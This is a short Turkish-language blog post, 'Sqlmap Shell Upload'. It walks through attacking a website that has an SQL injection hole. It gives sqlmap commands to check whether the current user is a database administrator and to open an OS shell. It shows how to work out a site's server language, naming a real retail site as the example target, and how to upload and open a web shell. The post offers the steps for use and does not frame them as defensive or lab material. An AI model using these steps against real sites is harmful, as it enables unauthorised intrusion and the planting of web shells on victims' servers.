3 Eylül 2019 Salı

Sqlmap Shell Upload



Öncelikle Sql açıklı sitemizi buluyoruz
ve sitemizde bir sqlmap sorgusu başlatıyoruz.Fakat bu sorgu diğerlerinden
farklı oluyor.


Bu sefer --dbs komutu yerine --current-user --is-dba komutunu gireceğiz.

Kod:
sqlmap -u "www.sqlsorgulanacaksite.com/php?id=" --dbs
yerine

Kod:
sqlmap -u "www.sqlsorgulanacaksite.com/php?id=" --current-user --is-dba
komutu ile ancak Sorgulamayı başlatabiliriz. Biraz bekledikten sonra eğer şöyle birşey görürseniz.


Kod:
current user is DBA : True 

Bilinizki shell sokmaya çok yakınsınız.Peki şimdi ne yapacağız?

Kod:
sqlmap -u "www.sqlsorgulanacaksite.com/php?id=" --os-shel
Yapıyoruz ve karşımıza sitenin yazılmış olduğu dili soruyor.Bu dili şu yolla bulabiliriz. 

Mesela sitemiz şu

Kod:
https://www.diapers.com/ 
bu siteye girdim ve .comdan sonra şunu denedim

Kod:
https://www.diapers.com/index.php
Pagenotfound hatası aldım demekki php ile yazılmamış.Daha sonra şunu denedim

Kod:
https://www.diapers.com/index.asp
Gene Pagenotfound hatası aldım demekki asp ile de yazılmamış.Fakat şunu denediğimde

Kod:
https://www.diapers.com/index.aspx 
Ana sayfasına ulaştım yani sayfa aspx dili ile yazılmış.Sqlmap size şöyle
seçenekler verir.

|1|ASP
|2|ASPX
|3|PHP
|4|JSP

bu durumda Sayfamızın dilini yani aspx'i işaretledik.Hedef sitemiz diapers.com çünkü.


Artık shellimizi upload edebiliriz.Upload ettikten sonra linkte (.php yada .asp yada .aspx den önceki yazan yazıyı silip shellin adını yazıp)


enterlamanız yeterli örnek:

Kod:
www.hedefsite.com/events/supercali/tmpuhvef.php
de upload ediyoruz mesela shellimin adı k2.php olsun

Kod:
www.hedefsite.com/events/supercali/k2.php 

0 comentários:

Yorum Gönder